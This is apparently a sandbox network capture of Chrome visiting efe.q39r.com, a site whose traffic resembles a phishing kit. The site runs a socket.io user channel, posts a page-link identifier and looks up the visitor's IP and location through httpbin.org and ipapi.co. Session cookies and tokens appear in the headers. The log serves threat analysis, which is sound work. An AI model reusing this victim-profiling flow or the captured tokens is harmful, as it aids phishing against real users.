                                                                                  X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAYPwOLpZD9YPgfrPMf4AeuVLP4KhHN5JW4ZGuoCajahei29Yr4XAvSjo2GPcYQ6ZQfUEQ65l0UpJr5ELA9YbC6aDcfw9byGLR55fg3QE6LpVwB1hIRMQQz%2B8XLjfq1HJSLzI0aPcJRVrUnoq1UsMgbgQmboGwzXKYE3xX%2BmJYuEMa5JIE0RNQGt%2Bb4TRUkyTfk67ddzgXjjpr46msoNA8Lb6qp2RTb39zVnEwQEXjJBfYOg6Mn4yv7MIfIcljCfobMbUmzl4dEwGrgR%2BOzdEe%2BB/SVSihwBPpRPQ3m0R/J3/nTUilxdT1BoiimQhq092UWOV2vGktBCAP6PbrwHj9KQDZgAACMsEQqgi6x8rqAHlMn6l0ukonYgeKuPu1CFsZejFYmSbzagTo5/XhtTabZb1ZO6yoUjfrImR5ADhcBWQq8BCf9F62mDi/s1Ybaza0J3FT4EHOZXX8dk3DgxP/dSBpH14Ow5cFWECZsBa%2B4zcQcr6uUw0ADdf1t6Uvhaeh7SWLWJdtVV4Y%2B6GJmxCapwwypCgDFPU6HDkwgrMIKmMporwxNSsKob/i/9UWoYJct9ZQI0wn155wgeDHJXDTxRkJtX5NjS4B7jzR1T5WoDNfapV3lH8qp3eXpwfjpaKXo%2B8QlUmgJcus/BbqCW15VZ%2Bk1INPyr/Y7cHOF1ZZvhZqbCXmPFjzjHNOCe5c3nJ/u3E84GsYIPBCtO2S7g95Oq91FAAu3wUR81W4ExibwWrsJRClVThXdKgISNvzqTdqj8dPOEgKUZGvJnhTHT6GzRMeyoucNLssj6JPDDANIr3Cn8ir/awGI21RMH3WQIVe7GFFEGK1bi8bBgjlHbC99BD1zU/IuZXaQBV1nqPgx9H0kthhHUgYjTt81auOMy5fw88Q9U7kGVjcU88LOy5Ko//AsBACSDW2gE%3D%26p%3D
                                                                                  X-Agent-DeviceId: 01000A41090080B6
                                                                                  X-BM-CBT: 1714062227
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                  X-Device-isOptin: false
                                                                                  Accept-language: en-GB, en, en-US
                                                                                  X-Device-Touch: false
                                                                                  X-Device-ClientSession: 9555A92DE7EE4ED1A2C38905CA034190
                                                                                  X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                  Host: www.bing.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                                                                  2024-04-25 16:23:52 UTC1463INHTTP/1.1 200 OK
                                                                                  Cache-Control: private
                                                                                  Content-Length: 2215
                                                                                  Content-Type: application/json; charset=utf-8
                                                                                  P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                  Set-Cookie: _EDGE_S=SID=1E11A663AA1960AD3420B20FAB0E6151&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                  Set-Cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 20-May-2025 16:23:52 GMT; path=/; HttpOnly
                                                                                  Set-Cookie: ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; domain=.bing.com; expires=Tue, 20-May-2025 16:23:52 GMT; path=/; secure; SameSite=None
                                                                                  Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                  Set-Cookie: _SS=SID=1E11A663AA1960AD3420B20FAB0E6151; domain=.bing.com; path=/; secure; SameSite=None
                                                                                  X-EventID: 662a8398ccfb49d888cc29f180ee1b90
                                                                                  UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                  X-XSS-Protection: 0
                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  X-MSEdge-Ref: Ref A: 9A4B34EF220743E2BF77932EC89FDCA6 Ref B: ATL331000104045 Ref C: 2024-04-25T16:23:51Z
                                                                                  Date: Thu, 25 Apr 2024 16:23:52 GMT
                                                                                  Connection: close
                                                                                  2024-04-25 16:23:52 UTC331INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65
                                                                                  Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value
                                                                                  2024-04-25 16:23:52 UTC1884INData Raw: 74 75 72 65 22 3a 22 22 7d 2c 22 43 6c 6f 75 64 4d 75 73 69 63 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 43 6c 6f 75 64 41 67 65 6e 74 5f 47 6c 6f 62 61 6c 53 68 65 6c 6c 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 43 6c 6f 75 64 41 67 65 6e 74 5f 4c 61 75 6e 63 68 41 70 70 6c 69 63 61 74 69 6f 6e 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 43 6c 6f 75 64 41 67 65 6e 74 5f 53 65 74 74 69 6e 67 73 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 44 65 76 69 63 65 4d 61 6e 61 67 65 6d 65 6e 74 45 6e 61 62 6c 65 64 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c
                                                                                  Data Ascii: ture":""},"CloudMusic":{"value":false,"feature":""},"CloudAgent_GlobalShell":{"value":false,"feature":""},"CloudAgent_LaunchApplication":{"value":false,"feature":""},"CloudAgent_Settings":{"value":false,"feature":""},"DeviceManagementEnabled":{"value":fal


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  75192.168.2.174979335.190.80.14435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:00 UTC535OUTOPTIONS /report/v4?s=41qc4J0bHsl7dvg%2FUl2eh3v%2BzuGu75ioqmdfroAGPVzU7SfrFlsHk74%2BvhHRn9sGVnM%2BrleGdIhLZ1W%2FCHgb1yE7582Sn2iCW7XMiXpV0B2wuWDpJfxvPU186a0E2w%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Origin: https://efe.q39r.com
                                                                                  Access-Control-Request-Method: POST
                                                                                  Access-Control-Request-Headers: content-type
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:24:00 UTC336INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  access-control-max-age: 86400
                                                                                  access-control-allow-methods: POST, OPTIONS
                                                                                  access-control-allow-origin: *
                                                                                  access-control-allow-headers: content-length, content-type
                                                                                  date: Thu, 25 Apr 2024 16:24:00 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  76192.168.2.174979435.190.80.14435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:01 UTC480OUTPOST /report/v4?s=41qc4J0bHsl7dvg%2FUl2eh3v%2BzuGu75ioqmdfroAGPVzU7SfrFlsHk74%2BvhHRn9sGVnM%2BrleGdIhLZ1W%2FCHgb1yE7582Sn2iCW7XMiXpV0B2wuWDpJfxvPU186a0E2w%3D%3D HTTP/1.1
                                                                                  Host: a.nel.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 863
                                                                                  Content-Type: application/reports+json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:24:01 UTC863OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 36 34 37 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 38 37 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 38 2e 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 65 66 65 2e 71 33 39 72 2e 63 6f
                                                                                  Data Ascii: [{"age":26475,"body":{"elapsed_time":2872,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.218.12","status_code":404,"type":"http.error"},"type":"network-error","url":"https://efe.q39r.co
                                                                                  2024-04-25 16:24:01 UTC168INHTTP/1.1 200 OK
                                                                                  Content-Length: 0
                                                                                  date: Thu, 25 Apr 2024 16:24:00 GMT
                                                                                  Via: 1.1 google
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  77192.168.2.1749795172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:07 UTC1277OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: Upgrade
                                                                                  Pragma: no-cache
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Upgrade: websocket
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-WebSocket-Version: 13
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  Sec-WebSocket-Key: 9MXYgq9kG2JILXmcJ99WsA==
                                                                                  Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                  2024-04-25 16:24:08 UTC569INHTTP/1.1 400 Bad Request
                                                                                  Date: Thu, 25 Apr 2024 16:24:07 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TD7ZGqz3S5zCJobzxGIWbxXtqXNMayiRHqeT6nUBein9mZ%2F77pBSIs51McdcuULSzO0aOUd0gVyT6FurHAHf73aeKFVPEq8oUGc0B5OASeS%2Fhj5DBquLfM2paksUZ4A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fae77fe6c44d1-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 16:24:08 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                                  Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                                  2024-04-25 16:24:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  78192.168.2.1749798172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:26 UTC1558OUTPOST /ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pe HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  Content-Length: 32
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                  X-Requested-With: XMLHttpRequest
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:24:26 UTC32OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 4b 35 4c 79 38 51 6d 26 74 79 70 65 3d 39 26 61 70 70 6e 75 6d 3d 31
                                                                                  Data Ascii: pagelink=K5Ly8Qm&type=9&appnum=1
                                                                                  2024-04-25 16:24:27 UTC997INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:24:27 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, private
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QP7ERWwnEaV9PTT6iTFqZRKc31rKfXPveazJ2DFfnMOdwgW9Pp3f4RKnem77o0dUJS4f9OhHvJ0selHlRz%2BfcZIwFQ3Kfs7x%2FynsRE6oCi7dySWdD2bXL21NQZM%2Fbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IjZYaHZCU0tFYk5McldIcTFLcHB2a1E9PSIsInZhbHVlIjoieUczamRrLzYrZENCcVZNUXR1bk1RZGVGU1V1dkIrb2dQZUhzRGF2MEtkLzRGQTI1QWJGY2llMGRTT3VZa3JYeWcyS21ReFlGeGZ0cm5NYk9sOFNEOHJjWWxIMW1XeS96d2ZodFpEa29zS2lmUkM1ckRTRk9IV0VBS0R6K045blYiLCJtYWMiOiJmMGEzYWNlMjg5NmQ0NWQzNjNjZTZjNjVlMDBhYjc4YTVmNDc1YWE1MWEyNDM1ZTdlZTliMDA2ZmU5ZWI5ZmJiIiwidGFnIjoiIn0%3D; expires=Thu, 25-Apr-2024 18:24:27 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                  2024-04-25 16:24:27 UTC518INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 74 6e 64 33 70 72 57 55 52 7a 4d 45 39 4b 4e 6d 46 58 55 30 31 76 51 6b 77 32 4f 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 55 6c 30 62 48 68 6e 64 54 6c 52 4e 32 55 7a 4e 6c 46 42 64 54 42 73 64 45 31 35 62 55 6f 35 52 31 51 76 61 6d 74 6d 53 58 4a 31 5a 48 4a 49 53 7a 4a 36 64 30 52 6d 55 56 63 78 54 54 4e 34 53 48 70 51 5a 6b 46 7a 54 6b 6c 31 54 6c 4a 46 55 31 5a 79 53 6e 42 4f 4d 7a 64 30 59 7a 5a 6c 53 6c 5a 32 56 55 35 76 62 45 39 69 51 33 68 45 4e 56 56 47 51 33 4e 59 52 32 35 51 62 7a 42 54 64 30 78 56 61 56 68 7a 51 55 70 77 51 31 64 73 54 48 42 76 57 44 56 72 51 6b 31 34 4c 7a 63 30 56 32 5a 6c 65 57 46 32 55 48 51
                                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Imtnd3prWURzME9KNmFXU01vQkw2OVE9PSIsInZhbHVlIjoiTUl0bHhndTlRN2UzNlFBdTBsdE15bUo5R1QvamtmSXJ1ZHJISzJ6d0RmUVcxTTN4SHpQZkFzTkl1TlJFU1ZySnBOMzd0YzZlSlZ2VU5vbE9iQ3hENVVGQ3NYR25QbzBTd0xVaVhzQUpwQ1dsTHBvWDVrQk14Lzc0V2ZleWF2UHQ
                                                                                  2024-04-25 16:24:27 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                                  Data Ascii: 14{"status":"success"}
                                                                                  2024-04-25 16:24:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  79192.168.2.174979934.196.110.254435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:27 UTC578OUTGET /ip HTTP/1.1
                                                                                  Host: httpbin.org
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  Accept: application/json, text/javascript, */*; q=0.01
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:24:27 UTC243INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:24:27 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 33
                                                                                  Connection: close
                                                                                  Server: gunicorn/19.9.0
                                                                                  Access-Control-Allow-Origin: https://efe.q39r.com
                                                                                  Access-Control-Allow-Credentials: true
                                                                                  2024-04-25 16:24:27 UTC33INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 22 0a 7d 0a
                                                                                  Data Ascii: { "origin": "185.152.66.230"}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  80192.168.2.1749800172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:27 UTC1105OUTGET /ajNyX2SU9rhFeYXrhcFSd76xsstnihCYYJkPQp8lDwn8pe HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IjZYaHZCU0tFYk5McldIcTFLcHB2a1E9PSIsInZhbHVlIjoieUczamRrLzYrZENCcVZNUXR1bk1RZGVGU1V1dkIrb2dQZUhzRGF2MEtkLzRGQTI1QWJGY2llMGRTT3VZa3JYeWcyS21ReFlGeGZ0cm5NYk9sOFNEOHJjWWxIMW1XeS96d2ZodFpEa29zS2lmUkM1ckRTRk9IV0VBS0R6K045blYiLCJtYWMiOiJmMGEzYWNlMjg5NmQ0NWQzNjNjZTZjNjVlMDBhYjc4YTVmNDc1YWE1MWEyNDM1ZTdlZTliMDA2ZmU5ZWI5ZmJiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imtnd3prWURzME9KNmFXU01vQkw2OVE9PSIsInZhbHVlIjoiTUl0bHhndTlRN2UzNlFBdTBsdE15bUo5R1QvamtmSXJ1ZHJISzJ6d0RmUVcxTTN4SHpQZkFzTkl1TlJFU1ZySnBOMzd0YzZlSlZ2VU5vbE9iQ3hENVVGQ3NYR25QbzBTd0xVaVhzQUpwQ1dsTHBvWDVrQk14Lzc0V2ZleWF2UHQiLCJtYWMiOiJmZmQ3ZDBmNmJkMTk0YWVlZTFmYWM0ZTYxNjc1NWU4ZDA5MDI1N2FlMTMxMDJlY2EwNDllYzhiMmJhYmVkYmE1IiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:24:28 UTC587INHTTP/1.1 404 Not Found
                                                                                  Date: Thu, 25 Apr 2024 16:24:28 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDQLz7RdfVLYq8Sp4uObxws6uuK%2FDpH9%2B4j5xh8V2xvz12OMeYg7XayxT%2FLwZRTQ6tAVkZJZ%2FtbPHQkjSBkIB%2Bd%2BRLOGetjc1QRnBZwb6XYz%2F1z7ZXSIORFGDlPCQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879faef5cd9753d5-ATL
                                                                                  2024-04-25 16:24:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  81192.168.2.1749802172.67.69.2264435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:24:27 UTC550OUTGET /185.152.66.230/json/ HTTP/1.1
                                                                                  Host: ipapi.co
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://efe.q39r.com
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://efe.q39r.com/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2024-04-25 16:24:27 UTC716INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:24:27 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 773
                                                                                  Connection: close
                                                                                  Allow: OPTIONS, POST, OPTIONS, GET, HEAD
                                                                                  X-Frame-Options: DENY
                                                                                  Vary: Host, origin
